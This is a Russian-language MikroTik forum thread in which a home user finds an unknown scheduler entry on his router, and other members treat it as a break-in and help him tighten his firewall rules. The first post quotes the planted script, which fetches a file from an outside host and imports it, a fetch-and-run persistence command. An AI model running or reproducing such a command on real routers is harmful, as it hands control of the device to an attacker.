Неизвестная запись в System/Scheduler

Автоматизация при помощи встроенного скриптового языка и RouterOS API
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Добрый вечер. Сегодня настраивал отправку уведемлениий об появлении новой прошивки в telegram и обнаружил неизвестную запись в System/Scheduler

Код: Выделить всё

/tool fetch url=http://ciskotik.com/poll/4e24192a-ecb2-4a45-81bd-b0fb225410e5 mode=http dst-path=7xe7zt46hb08
/import 7xe7zt46hb08
https://imgur.com/a/NUUdwFq
Что это может быть?
Аватара пользователя
Sir_Prikol
Сообщения: 560
Зарегистрирован: 14 апр 2018, 15:21
Откуда: СССР

Re: Неизвестная запись в System/Scheduler

Сообщение Sir_Prikol »

Взлом, или кто-то пошутил
Проверяем юзеров, порты, фаер....
Дома: CCR2004 (7-ISP(GPON)белый IP)
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Sir_Prikol писал(а): 03 фев 2019, 16:09 Взлом, или кто-то пошутил
Проверяем юзеров, порты, фаер....
Какой выход из таких ситуаций, правильный. Нужно заново перенас ;) троить роутер? Или всего лишь удалить запись, но не известно ещё что-то может быть. И как защитится от подобного в будущем?
Аватара пользователя
Sir_Prikol
Сообщения: 560
Зарегистрирован: 14 апр 2018, 15:21
Откуда: СССР

Re: Неизвестная запись в System/Scheduler

Сообщение Sir_Prikol »

Правильный - настройка фаервола, ограничения юзеров, запрет портов...
Дома: CCR2004 (7-ISP(GPON)белый IP)
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Sir_Prikol писал(а): 03 фев 2019, 18:38 Правильный - настройка фаервола, ограничения юзеров, запрет портов...
Мои настройки firewall filter, закрыты все порты кроме тех которые нужны для PPTP.

Код: Выделить всё

/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=accept chain=input comment=bestpratice dst-port=23023 protocol=tcp
add action=accept chain=forward in-interface=bridge1-NET-V out-interface=\
    bridge2-NET-E
add action=accept chain=forward in-interface=bridge2-NET-E out-interface=\
    bridge1-NET-V
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
    protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
    protocol=gre
add action=drop chain=input comment="Close all ports" in-interface=\
    ether9-WAN-E
add action=drop chain=input comment="Close all ports" in-interface=\
    ether1-WAN-V
Что можете посоветовать для firewall filter, по возможности дайте командную строку
Я нашел в сети вот нашел стандартные правила

Код: Выделить всё

/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" connection-state=established,related
add action=drop chain=input comment="defconf: drop all from WAN" in-interface=ether1
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related routing-mark=main
add action=accept chain=forward comment="defconf: accept established,related" connection-state=established,related
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface=ether1
Сеть домашняя, юзеров как таковых нет, несколько пк через кабель и несколько устройств через cAP.
в настройках сети wifi
1) использую WPA2-PSK с aes-ccm шифрованием.
2) отключен WPS.
3) пароль 16 символов: большая буква, малая и цыфры
4) ограничен доступ по MAC-адресам в WiFi-сети.
5) снята галочка Default Forward в настройках wifi интерфейсах
6) скрыт SSID сети.
8) изменен MAC беспроводного интерфейса
что еще сделать?
Аватара пользователя
Chupaka
Сообщения: 3856
Зарегистрирован: 29 фев 2016, 15:26
Откуда: Минск

Re: Неизвестная запись в System/Scheduler

Сообщение Chupaka »

Определённо взлом :) https://forum.nag.ru/index.php?/topic/1 ... -na-vzlom/

Доступ в Интернет — IPoE, безо всяких тоннелей? Что у вас за бриджи там? Интерфейсы ether1,9 в них не входят?

Более жёсткий вариант защиты, чем ваш — разрешить то, что нужно, а затем дропнуть вообще всё (независимо от интерфейсов и другого).
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Да доступ по IPoE в оба порта
ether1 кабель от модема провайдера
ether9 кабель напрямую от провайдера.
Есть только PPTP на постоянной основе подключен один пк для использования VPN viewtopic.php?f=2&t=1938&p=4403#p4403

Относительно бриджей
Два бриджа на две сети/провайдера ether1,9 в них не входят!
https://imgur.com/a/eiaBAgM
Я думал что я полностью закрыт, по крайней мере Вы так мне говорили :)
Аватара пользователя
Chupaka
Сообщения: 3856
Зарегистрирован: 29 фев 2016, 15:26
Откуда: Минск

Re: Неизвестная запись в System/Scheduler

Сообщение Chupaka »

PPTP — ещё один аплинк, по сути? На нём, как вижу, ничего не блокируется.

И вы самую главную ссылку забыли — после слов "вы так мне говорили" :)
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Chupaka писал(а): 04 фев 2019, 12:27 PPTP — ещё один аплинк, по сути? На нём, как вижу, ничего не блокируется.

И вы самую главную ссылку забыли — после слов "вы так мне говорили" :)
PPTP — предполагаю, что да.
Помогите пожалуйста побороть это и не допустить в будующем. Вчера перенастроил роутер с нуля чтобы исключить чужие записи и сделал копию. Отправил Вам в личку полную конфигурацию роутера.
Извените не сильно понял, о чем Вы!
Аватара пользователя
Chupaka
Сообщения: 3856
Зарегистрирован: 29 фев 2016, 15:26
Откуда: Минск

Re: Неизвестная запись в System/Scheduler

Сообщение Chupaka »

r136a8 писал(а): 04 фев 2019, 12:34 PPTP — предполагаю, что да.
Помогите пожалуйста побороть это и не допустить в будующем.
Я выше написал, как побороть:
Chupaka писал(а): 03 фев 2019, 19:27 разрешить то, что нужно, а затем дропнуть вообще всё (независимо от интерфейсов и другого).

r136a8 писал(а): 04 фев 2019, 12:34 Извените не сильно понял, о чем Вы!
О том месте, где я так говорил :)
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Мне нужен извне только PPTP ну и интернет :)
Как дропнуть все остальное?

А то, что мы закрыли все порты кроме тех, что нужны для PPTP. это не то что Вы имеете ввиду (разрешить то, что нужно, а затем дропнуть вообще всё (независимо от интерфейсов и другого).
Аватара пользователя
Chupaka
Сообщения: 3856
Зарегистрирован: 29 фев 2016, 15:26
Откуда: Минск

Re: Неизвестная запись в System/Scheduler

Сообщение Chupaka »

r136a8 писал(а): 04 фев 2019, 13:11 Как дропнуть все остальное?

Код: Выделить всё

/ip firewall filter add chain=input action=drop
r136a8 писал(а): 04 фев 2019, 13:11 А то, что мы закрыли все порты кроме тех, что нужны для PPTP. это не то что Вы имеете ввиду (разрешить то, что нужно, а затем дропнуть вообще всё (независимо от интерфейсов и другого).
Нет. У вас сейчас настроено:
1) Разрешить через ether1 подключение по PPTP, остальное с ether1 дропнуть
2) Разрешить через ether9 подключение по PPTP, остальное с ether9 дропнуть
3) Всё остальное по умолчанию разрешено

Под третий пункт попадает как ваша локалка, так и ваш PPTP. И любой другой интерфейс, который может быть задействован в будущем под WAN.
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Мне получается нужно разместить это правила самим последним?

Код: Выделить всё

/ip firewall filter add chain=input action=drop
Все таки запутался. Если на wan ether1 и ether9 разрешено только PPTP а все остальное дропнуть то зачем делать что то еще так как остается только локалка?

Из того что прочитал вот тут о стандартных правилх Firewall https://weblance.com.ua/365-posledstviy ... nosti.html я сделал вот так:

Код: Выделить всё

/ip firewall filter
add action=accept chain=input comment="defconf: accept established,related" \
    connection-state=established,related
add action=accept chain=forward in-interface=bridge1-NET-V out-interface=\
    bridge2-NET-E
add action=accept chain=forward in-interface=bridge2-NET-E out-interface=\
    bridge1-NET-V
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
    protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
    protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether9-WAN-E
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related
add action=drop chain=forward comment="defconf: drop invalid" \
    connection-state=invalid
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether9-WAN-E
https://prnt.sc/mh3vyn
Правильно ли я сделал, проверьте пожалуйста правильность и очередность выполняемых правил.

Также после внесения изменений по ether9-WAN-E очень сильно упала скорость по кабелю. Нарузки на роутер нет.
Методом исключения (выключения всех и поочередно включением правил) выяснил, что скорость режет вот это правило (на данный момент я его отключил).

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related
Спасибо
Аватара пользователя
Chupaka
Сообщения: 3856
Зарегистрирован: 29 фев 2016, 15:26
Откуда: Минск

Re: Неизвестная запись в System/Scheduler

Сообщение Chupaka »

У вас три дырки в Интернет (ether1, ether9 и PPTP). По умолчанию всё разрешено, но две из них (ether1 и ether9) вы заткнули. Угадайте, почему третья дырка осталась открытой. Спойлер: потому что вы не добавили то правило, которое я вам дал.
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Chupaka писал(а): 06 фев 2019, 17:23 У вас три дырки в Интернет (ether1, ether9 и PPTP). По умолчанию всё разрешено, но две из них (ether1 и ether9) вы заткнули. Угадайте, почему третья дырка осталась открытой. Спойлер: потому что вы не добавили то правило, которое я вам дал.
Вот так, есть значение полследовательность всех этих правел? В такой последовательности и внесении вашего последнего правила из спойлера что вы мне давали, в бридже ether9-WAN-E пропадает интернет!
В ether1-WAN-V интернет есть!

Код: Выделить всё

/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" \
    connection-state=established,related
add action=reject chain=forward in-interface=bridge1-NET-V out-interface=\
    bridge2-NET-E reject-with=icmp-network-unreachable
add action=reject chain=forward in-interface=bridge2-NET-E out-interface=\
    bridge1-NET-V reject-with=icmp-network-unreachable
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
    protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
    protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether9-WAN-E
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related disabled=yes
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related disabled=yes
add action=drop chain=forward comment="defconf: drop invalid" \
    connection-state=invalid
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether9-WAN-E
add action=drop chain=input
Это 2 правила можно удалить?

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related

https://prnt.sc/mhgdkx
Аватара пользователя
Sir_Prikol
Сообщения: 560
Зарегистрирован: 14 апр 2018, 15:21
Откуда: СССР

Re: Неизвестная запись в System/Scheduler

Сообщение Sir_Prikol »

Фасттрак - убирает прохождение пакетов внутри сети из обработки процессором, что разгружает сам рутер и увеличивает скорость внутри сети

Правила в фаерволе ВСЕГДА имеют значение по очерёдности.
Дома: CCR2004 (7-ISP(GPON)белый IP)
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Sir_Prikol писал(а): 06 фев 2019, 17:53 Фасттрак - убирает прохождение пакетов внутри сети из обработки процессором, что разгружает сам рутер и увеличивает скорость внутри сети

Правила в файрволле ВСЕГДА имеют значение по очерёдности.
Подскажите пожалуйста правильность расположения правил согласно моему листу правил.
А почему же в другой моей сети bridge2-NET-E пропадает интернет при добавлении вот этого правила

Код: Выделить всё

/ip firewall filter add chain=input action=drop
А относительно Фасттрак при активировании этих правил у меня очень падает скорость интернета. По bridge2-NET-E с 75Mb до 2 MB, по bridge1-NET-V с 170Mb до 60 Mb

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related
Последний раз редактировалось r136a8 06 фев 2019, 18:13, всего редактировалось 3 раза.
Аватара пользователя
Chupaka
Сообщения: 3856
Зарегистрирован: 29 фев 2016, 15:26
Откуда: Минск

Re: Неизвестная запись в System/Scheduler

Сообщение Chupaka »

"Пропадает Интернет" - это что значит? Юзеры ходят в Интернет через chain=forward, и то, что вы блокируете chain=input, вообще не должно влиять на хождение пакетов пользователей в Интернет.

Другое дело, что доступ из локалки к роутеру при необходимости бы оставить (например, если роутер является DNS-сервером для пользователей)
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Chupaka писал(а): 06 фев 2019, 18:10 "Пропадает Интернет" - это что значит? Юзеры ходят в Интернет через chain=forward, и то, что вы блокируете chain=input, вообще не должно влиять на хождение пакетов пользователей в Интернет.

Другое дело, что доступ из локалки к роутеру при необходимости бы оставить (например, если роутер является DNS-сервером для пользователей)
При активировании этого правила, выхода в интернет нет только на bridge2-NET-E на bridge1-NET-V все хорошо.
Отшибка Chrome
https://prnt.sc/mhgv1h

Доступ из локалки bridge2-NET-E к роутеро по winbox есть, и к сетевым дискам NAS также.

Очередность моих правил правильная?
Вот эти два я не включаю по причине сильного падения скорости интернета.

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related
Аватара пользователя
Sir_Prikol
Сообщения: 560
Зарегистрирован: 14 апр 2018, 15:21
Откуда: СССР

Re: Неизвестная запись в System/Scheduler

Сообщение Sir_Prikol »

r136a8 писал(а): 06 фев 2019, 18:08
Sir_Prikol писал(а): 06 фев 2019, 17:53 Фасттрак - убирает прохождение пакетов внутри сети из обработки процессором, что разгружает сам рутер и увеличивает скорость внутри сети

Правила в файрволле ВСЕГДА имеют значение по очерёдности.
Подскажите пожалуйста правильность расположения правил согласно моему листу правил.
А почему же в другой моей сети bridge2-NET-E пропадает интернет при добавлении вот этого правила

Код: Выделить всё

/ip firewall filter add chain=input action=drop
А относительно Фасттрак при активировании этих правил у меня очень падает скорость интернета. По bridge2-NET-E с 75Mb до 2 MB, по bridge1-NET-V с 170Mb до 60 Mb

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related
Если вы имеете ввиду свой лист правил:

Код: Выделить всё

/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" connection-state=established,related
add action=reject chain=forward in-interface=bridge1-NET-V out-interface=bridge2-NET-E reject-with=icmp-network-unreachable
add action=reject chain=forward in-interface=bridge2-NET-E out-interface=bridge1-NET-V reject-with=icmp-network-unreachable
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" in-interface=ether9-WAN-E
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" connection-state=established,related disabled=yes
add action=accept chain=forward comment="defconf: accept established,related" connection-state=established,related disabled=yes
add action=drop chain=forward comment="defconf: drop invalid" connection-state=invalid
add action=drop chain=forward comment="defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment="defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat connection-state=new in-interface=ether9-WAN-E
add action=drop chain=input
то в нём я вообще не вижу PPTP интерфейса, я вижу только порт для PPTP, но никак не сам интерфейс
Читаем внимательно что написал мой коллега, и тогда правила будут более/менее в порядке
Дома: CCR2004 (7-ISP(GPON)белый IP)
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Извените но совсем понимаю что мне надо сделать. Я окончательно запутался!
Аватара пользователя
Sir_Prikol
Сообщения: 560
Зарегистрирован: 14 апр 2018, 15:21
Откуда: СССР

Re: Неизвестная запись в System/Scheduler

Сообщение Sir_Prikol »

У вас через фаервол фильтруются всего 2 интерфейса (ether1 и ether9) но не фильтруется pptp интерфейс
Дома: CCR2004 (7-ISP(GPON)белый IP)
Аватара пользователя
r136a8
Сообщения: 201
Зарегистрирован: 04 дек 2017, 00:01

Re: Неизвестная запись в System/Scheduler

Сообщение r136a8 »

Sir_Prikol писал(а): 06 фев 2019, 19:34 У вас через фаервол фильтруются всего 2 интерфейса (ether1 и ether9) но не фильтруется pptp интерфейс
Мне нужно добавить вот такое правило?

Код: Выделить всё

/ip firewall filter
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=pptp-out1
И того у меня получается вот такие правила в такой последовательности

Код: Выделить всё

/ip firewall filter
add action=accept chain=input comment="Allow PING (ICMP)" protocol=icmp
add action=accept chain=input comment="defconf: accept established,related" \
    connection-state=established,related
add action=reject chain=forward in-interface=bridge1-NET-V out-interface=\
    bridge2-NET-E reject-with=icmp-network-unreachable
add action=reject chain=forward in-interface=bridge2-NET-E out-interface=\
    bridge1-NET-V reject-with=icmp-network-unreachable
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether9-WAN-E protocol=tcp
add action=accept chain=input comment="Open PPTP" dst-port=1723 in-interface=\
    ether1-WAN-V protocol=tcp
add action=accept chain=input comment="Open PPTP" in-interface=ether1-WAN-V \
    protocol=gre
add action=accept chain=input comment="Open PPTP" in-interface=ether9-WAN-E \
    protocol=gre
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether1-WAN-V
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=ether9-WAN-E
add action=drop chain=input
add action=drop chain=input comment="defconf: drop all from WAN" \
    in-interface=pptp-out1
add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related disabled=yes
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related disabled=yes
add action=drop chain=forward comment="defconf: drop invalid" \
    connection-state=invalid
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether1-WAN-V
add action=drop chain=forward comment=\
    "defconf:  drop all from WAN not DSTNATed" connection-nat-state=!dstnat \
    connection-state=new in-interface=ether9-WAN-E

За исключением вот этих, они не активны так как снижают скорость интернета.

Код: Выделить всё

add action=fasttrack-connection chain=forward comment="defconf: fasttrack" \
    connection-state=established,related
add action=accept chain=forward comment="defconf: accept established,related" \
    connection-state=established,related
Выяснил почему после активации этого правила, у ПК который входил в bridge2-NET-E небыло интернета.

Код: Выделить всё

/ip firewall filter add chain=input action=drop
Потому что IP этого пк не проходил через родительский контроль. Хотя почему так, я имею ввиду получается все устройства должны проходить через сторонний DNS. Что с моим не так? У меня установлен 8.8.8.8

Код: Выделить всё

/ip firewall nat
add action=dst-nat chain=dstnat dst-port=53 protocol=udp src-address-list=\
    Kids-List to-addresses=77.88.8.7
add action=dst-nat chain=dstnat dst-port=53 protocol=tcp src-address-list=\
    Kids-List to-addresses=77.88.8.3
add action=dst-nat chain=dstnat dst-port=53 protocol=udp src-address-list=\
    Parents-List to-addresses=176.103.130.130
add action=dst-nat chain=dstnat dst-port=53 protocol=tcp src-address-list=\
    Parents-List to-addresses=176.103.130.130
Аватара пользователя
Sir_Prikol
Сообщения: 560
Зарегистрирован: 14 апр 2018, 15:21
Откуда: СССР

Re: Неизвестная запись в System/Scheduler

Сообщение Sir_Prikol »

У вас на рутере какая-то каша не понятная, на сейчас я совсем запутался каким образом вы получаете интернет, как его раздаётё внутри сети, как разделили на подсети и что с маркировкой маршрутизации.

По сути (мне так кажется) у вас понапихано толпа разных правил из разных источников, причём напихано бездумно. Тут разгребать и разгребать
Дома: CCR2004 (7-ISP(GPON)белый IP)